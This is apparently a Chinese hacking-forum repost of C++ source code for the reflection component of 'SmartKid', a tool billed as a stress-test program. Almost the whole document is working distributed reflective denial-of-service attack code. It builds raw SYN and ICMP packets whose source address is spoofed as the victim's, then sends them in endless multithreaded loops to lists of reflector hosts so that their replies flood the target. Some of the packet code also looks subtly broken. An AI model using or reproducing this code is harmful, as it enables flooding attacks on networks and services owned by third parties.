智慧小子SmartKid drdos循环反射部分源代码

鬼仔:前段时间发过智慧小子,现在作者提供了其循环反射部分的源代码。

信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

项目名称:智慧小子SmartKid
项目作者:dream2fly[W.H.L][E.S.T]
联系方式:[email protected]
项目类别:压力攻击测试程序
工作环境:win32(暂不支持XP SP2)

有了成果要公开, 不要舍不得,不然很快会过时的。。。:)
ICMP部分包构造感觉有问题,希望能得到反馈意见。

#include "StdAfx.h"
#include "drdos.h"
#include <Afxmt.h> //多线程头文件

CDrdos::CDrdos(void)
{
}

CDrdos::~CDrdos(void)
{
}

std::vector<CString> g_reflectlist;
static const int SleepTimes=10; ///<休眠时间0.01s
static CCriticalSection Tlock; ///<关键区

static SOCKET sock;
static SOCKADDR_IN syn_in;
static SOCKADDR_IN icmp_in;

static IP_HEADER ipheader;
static TCP_HEADER tcpheader;
static ICMP_HEADER icmpheader;
static PSD_HEADER psdheader;

void CDrdos::InitSynPacket(const u_long &target_ip, const u_short &target_port)
{
//填充IP首部
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
ipheader.tos=0;
ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER));
ipheader.ident=1;
ipheader.frag_and_flags=0x40;
ipheader.ttl=255; //最大
ipheader.proto=IPPROTO_TCP;
ipheader.checksum=0;
ipheader.sourceIP=htonl(target_ip);
ipheader.destIP=htonl(target_ip);

//填充Tcp首部
tcpheader.th_dport=htons(target_port);
tcpheader.th_sport=htons(target_port);
tcpheader.th_seq=htonl(rand());
tcpheader.th_ack=0;
tcpheader.th_lenres=(sizeof(TCP_HEADER)/4<<4|0);
tcpheader.th_flag=2; //syn 00000010 修改这里来实现不同的标志位探测,2是SYN,1是FIN,16是ACK探测
tcpheader.th_win=htons(512);
tcpheader.th_urp=0;
tcpheader.th_sum=0;

//填充TCP伪首部用来计算TCP头部的效验和
psdheader.saddr=ipheader.sourceIP;
psdheader.daddr=ipheader.destIP;
psdheader.mbz=0;
psdheader.ptcl=IPPROTO_TCP;
psdheader.tcpl=htons(sizeof(TCP_HEADER));
}

void CDrdos::InitIcmpPacket(const u_long &target_ip, const u_short &target_port)
{
//填充IP首部
ipheader.h_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long));
ipheader.tos=0;
ipheader.total_len=htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER));
ipheader.ident=1;
ipheader.frag_and_flags=0x40;
ipheader.ttl=255; //最大
ipheader.proto=IPPROTO_ICMP;
ipheader.checksum=0;
ipheader.sourceIP=htonl(target_ip);
ipheader.destIP=htonl(target_ip);

//填充ICMP首部
icmpheader.ih_type=8;
icmpheader.ih_code=0;
icmpheader.ih_cksum=0;
icmpheader.ih_id=(USHORT)GetCurrentProcessId();
icmpheader.ih_seq=htons(u_short(rand()));
icmpheader.ih_timestamp=htonl(GetTickCount());
}

DWORD CDrdos::syn_drdosthread(LPVOID param)
{
DWORD dwResult=0;

CString reflect_ip_port;
u_long reflect_ip;
u_short reflect_port;

int randnum=0;
while(true)
{
Tlock.Lock();
for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
{
reflect_ip_port=*iter;
int index=reflect_ip_port.Find (":",0);
char *zombies_ip=new char[20];
memcpy(zombies_ip,reflect_ip_port,index);
zombies_ip[index]=0;
if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
{
delete []zombies_ip;
continue; //跳过无效IP地址
}
delete []zombies_ip;
reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));

if(randnum==2006)
{
randnum=0;
}
else
{
++randnum;
}
u_long seq_num = MakeRand32(randnum);

ipheader.destIP=reflect_ip;
ipheader.ident = rand();
ipheader.checksum = 0;

tcpheader.th_dport = htons(reflect_port);
tcpheader.th_seq = htonl(seq_num);
tcpheader.th_sum = 0;

psdheader.daddr = ipheader.destIP;

//计算校验和
char SendBuff[128]={0};

//计算TCP校验和
memcpy(SendBuff, &psdheader, sizeof(PSD_HEADER));
memcpy(SendBuff+sizeof(PSD_HEADER), &tcpheader, sizeof(TCP_HEADER));
tcpheader.th_sum=checksum((u_short *)SendBuff,sizeof(PSD_HEADER)+sizeof(TCP_HEADER));

/////////
//计算IP检验和
memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &tcpheader, sizeof(TCP_HEADER));
memset(SendBuff+sizeof(IP_HEADER)+sizeof(TCP_HEADER),0,4);
ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));

syn_in.sin_family = AF_INET;
syn_in.sin_addr.s_addr = reflect_ip;
syn_in.sin_port = htons(reflect_port);

//发送数据包
int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&syn_in, sizeof(syn_in));
if(ret==SOCKET_ERROR)
{
CString err;
err.Format("错误号:%d\n\n请到http://www.dream2fly.net/forum提交这个错误号!\n\n您提交的意见将会在下版本中改进。",WSAGetLastError());
MessageBox(NULL,err,"wrong",MB_OK);
return WSAGetLastError(); //XP sp2下raw socket send() 10004 Error,xp sp2下不支持raw socket
}
}
Tlock.Unlock();
}

return dwResult;
}

DWORD CDrdos::icmp_drdosthread(LPVOID param)
{
DWORD dwResult=0;

//Tlock.Lock();
CString reflect_ip_port;
u_long reflect_ip;
u_short reflect_port;
//Tlock.Unlock();

int randnum=0;
while(true)
{
for(std::vector<CString>::const_iterator iter=g_reflectlist.begin();iter!=g_reflectlist.end();++iter)
{
reflect_ip_port=*iter;
int index=reflect_ip_port.Find (":",0);
char *zombies_ip=new char[20];
memcpy(zombies_ip,reflect_ip_port,index);
zombies_ip[index]=0;
if( (reflect_ip=inet_addr(zombies_ip)) == INADDR_NONE)
{
delete []zombies_ip;
continue; //跳过无效IP地址
}
delete []zombies_ip;
reflect_port= atoi(reflect_ip_port.Right(reflect_ip_port.GetLength() - index - 1));

if(randnum==2006)
{
randnum=0;
}
else
{
++randnum;
}
u_short seq_num = MakeRand16(randnum);

ipheader.destIP = reflect_ip;
ipheader.ident = rand();
ipheader.checksum = 0;

icmpheader.ih_cksum=0;
icmpheader.ih_id=(USHORT)GetCurrentProcessId();
icmpheader.ih_seq=htons(seq_num);
icmpheader.ih_timestamp=htonl(GetTickCount());

//计算ICMP校验和
icmpheader.ih_cksum=checksum((u_short *)&icmpheader,sizeof(ICMP_HEADER));

char SendBuff[128]={0};
//计算IP检验和
memcpy(SendBuff, &ipheader, sizeof(IP_HEADER));
memcpy(SendBuff+sizeof(IP_HEADER), &icmpheader, sizeof(ICMP_HEADER));
ipheader.checksum=checksum((u_short *)SendBuff,sizeof(IP_HEADER));

icmp_in.sin_family = AF_INET;
icmp_in.sin_addr.s_addr =reflect_ip;
icmp_in.sin_port = htons(reflect_port);

//发送数据包
int ret=sendto(sock, SendBuff, sizeof(IP_HEADER)+sizeof(TCP_HEADER), 0, (struct sockaddr*)&icmp_in, sizeof(icmp_in));
if(ret==SOCKET_ERROR)
{
CString err;
err.Format("错误号:%d\n\n请到http://www.dream2fly.net/forum提交这个错误号和您的操作系统版本!\n\n您提交的意见将会在下版本中改进。",WSAGetLastError());
MessageBox(NULL,err,"wrong",MB_OK);
return WSAGetLastError(); //XP sp2下raw socket send() 10004 Error,xp sp2下不支持raw socket
}
}
}

return dwResult;
}

void CDrdos::start(const int threadnum,const link_type drdostype,const u_long &target_ip,const u_short &target_port,const std::vector<CString> &reflect_list)
{
m_threadnum=threadnum;
g_reflectlist=reflect_list;
//sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
if(sock ==INVALID_SOCKET)
{
MessageBox(NULL,"Init wrong!!submit bug?Go To http:///www.dream2fly.net !","wrong",MB_OK);
return;
}

BOOL flag=true;
int ret=setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag));
checkerror(ret,"IP_HDRINCL");

int nTimeOut =2000;//2s
ret=setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&nTimeOut,sizeof(nTimeOut));
checkerror(ret,"SO_SNDTIMEO");
ret=setsockopt(sock,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeOut,sizeof(nTimeOut));
checkerror(ret,"SO_SNDTIMEO");
switch(drdostype)
{
case _SYN:
{
//开始初始化数据包
InitSynPacket(target_ip,target_port);
break;
}
case _ICMP:
{
//开始初始化数据包
InitIcmpPacket(target_ip,target_port);
break;
}
default:
{
//开始初始化数据包
InitSynPacket(target_ip,target_port);
break;;
}
}

DWORD thread_ID=1;
HANDLE *hDrdosThread =new HANDLE[m_threadnum];
switch(drdostype)
{
case _SYN:
{
for(int i=0;i!=m_threadnum;++i)
{
hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)syn_drdosthread,NULL,0,&thread_ID);
if(hDrdosThread==NULL)
{
MessageBox(NULL,"CreateThread error!","Error",MB_OK);
}
Sleep(SleepTimes);
++thread_ID;
}
break;
}
case _ICMP:
{
for(int i=0;i!=m_threadnum;++i)
{
hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)icmp_drdosthread,NULL,0,&thread_ID);
if(hDrdosThread==NULL)
{
MessageBox(NULL,"CreateThread error!","Error",MB_OK);
}
Sleep(SleepTimes);
++thread_ID;
}
break;
}
default:
{
for(int i=0;i!=m_threadnum;++i)
{
hDrdosThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)syn_drdosthread,NULL,0,&thread_ID);
if(hDrdosThread==NULL)
{
MessageBox(NULL,"CreateThread error!","Error",MB_OK);
}
Sleep(SleepTimes);
++thread_ID;
}
break;
}
}

DWORD WaitThread = WaitForMultipleObjects( m_threadnum , hDrdosThread , TRUE , INFINITE );
if( WaitThread != WAIT_FAILED)
{
for( int n = 0 ; n != m_threadnum; ++n )
{
CloseHandle( hDrdosThread[n] );
}
}
//关闭套接口
closesocket(sock);
}

相关日志

发表评论